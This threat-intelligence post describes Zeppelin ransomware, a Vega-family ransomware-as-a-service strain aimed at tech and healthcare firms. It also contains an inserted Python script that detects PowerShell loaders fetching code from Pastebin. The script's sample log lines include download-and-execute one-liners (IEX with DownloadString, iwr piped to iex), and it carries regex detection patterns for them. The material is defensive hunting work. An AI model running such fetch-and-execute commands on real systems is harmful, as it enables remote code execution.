Zeppelin Ransomware Hitting High Profile Users in U.S. and Europe - Binary Defense

Threat Watch


Zeppelin Ransomware Hitting High Profile Users in U.S. and Europe

Russia: Zeppelin is the newest member of the Delphi-based Ransomware-as-a-Service (RaaS) family initially known as Vega or VegaLocker. The biggest difference between Zeppelin and its predecessors is the attack campaigns. Previous campaigns utilizing Vega were spread to Russian-speaking users, with a focus on those in accounting, through a widespread malvertising campaign. The binaries were typically signed with valid certificates and hosted on GitHub. In this most recent campaign, Zeppelin has been targeting a select handful of tech and healthcare companies in Europe and the United States. Unlike its predecessor Vega, Zeppelin binaries are designed to stop running if they detect that they are running on a machine based in Russia or any former Soviet state. Zeppelin is capable of being deployed as a .exe, a DLL, or placed in a PowerShell loader. Zeppelin was found to be hosted on watering-hole websites, except for PowerShell variants, which were hosted on Pastebin. Researchers currently believe that at least some of the attacks were conducted through Managed Security Service Providers (MSSPs) but gave no further details of how they came to that conclusion.
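The PowerShell loader variants described above were reported as hosted on Pastebin, which gives defenders a concrete hunting signal. The script below is an added example, not code from the Binary Defense article or from any vendor: it parses constructed PowerShell ScriptBlock-style log lines (the `host=`/`user=`/`script=` format and the sample lines are assumptions made for illustration) and flags commands that fetch content from pastebin.com, annotating each hit with whether a download cmdlet and an inline-execution primitive were also present.

```python
"""Flag PowerShell script blocks that pull content from Pastebin.

Added example (not from the original article). The log format and the
sample lines are constructed for illustration; adapt parse_line() to the
real event source (e.g. Event ID 4104 ScriptBlockText) in production.
"""
import re
from dataclasses import dataclass

# Constructed sample log lines: "<timestamp> host=<name> user=<user> script=<text>"
SAMPLE_LOGS = [
    "2019-12-11T08:01:22Z host=WS01 user=alice script=Get-ChildItem C:\\Reports",
    "2019-12-11T08:03:45Z host=WS02 user=bob script=IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')",
    "2019-12-11T08:05:10Z host=WS03 user=carol script=Invoke-WebRequest https://intranet.example/update.ps1 -OutFile update.ps1",
    "2019-12-11T08:07:33Z host=WS02 user=bob script=iwr -Uri 'http://pastebin.com/raw/EXAMPLE2' | iex",
]

LOG_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) script=(?P<script>.*)$")

# Download primitives commonly used by PowerShell loaders, the paste host, and inline execution.
DOWNLOAD_RE = re.compile(r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.I)
PASTEBIN_RE = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.I)
EXEC_RE = re.compile(r"\b(Invoke-Expression|iex)\b", re.I)


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    reasons: tuple
    script: str


def parse_line(line):
    """Return the fields of one log line, or None if it does not match the assumed format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.groupdict()


def assess(script):
    """Return a tuple of indicator names present in a script block (empty if none)."""
    reasons = []
    if PASTEBIN_RE.search(script):
        reasons.append("pastebin_url")
    if DOWNLOAD_RE.search(script):
        reasons.append("download_cmdlet")
    if EXEC_RE.search(script):
        reasons.append("inline_execution")
    return tuple(reasons)


def scan(lines):
    """Return a Finding for every parseable line whose script references pastebin.com.

    The Pastebin URL is the trigger; the download and execution indicators are
    recorded alongside it so an analyst can prioritise download-and-run chains.
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = assess(rec["script"])
        if "pastebin_url" in reasons:
            findings.append(Finding(rec["ts"], rec["host"], rec["user"], reasons, rec["script"]))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f.timestamp, f.host, f.user, ",".join(f.reasons))
```

Run against the constructed sample, only the two WS02 lines are reported, each carrying all three indicators; the intranet download on WS03 is parsed but not flagged because the trigger is the paste host, not downloading in general.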

ANALYST NOTES

With the significant shift in tactics for this campaign versus campaigns utilizing Zeppelin’s predecessor, Vega, it is likely that Zeppelin is being leveraged by different threat actors. The fact that this variant has been specifically designed to avoid organizations in Russia and former Soviet states further supports the idea that a different group is behind Zeppelin’s operation. Such a shift in the operation of ransomware is another example of how important it is for security personnel to be fluid in their monitoring and response to threats. Malvertising is a technique in which threat actors use the same targeting services that are normally used to deliver targeted ads: instead of simply showing a marketing message, these ads embed malicious code that is delivered alongside non-malicious content on websites that the targeted people are likely to visit. The best protection against malvertising is to keep web browsers up-to-date and disable plug-ins such as Java and Flash so they don’t run in the web browser. Further information on how Zeppelin operates can be found at https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html
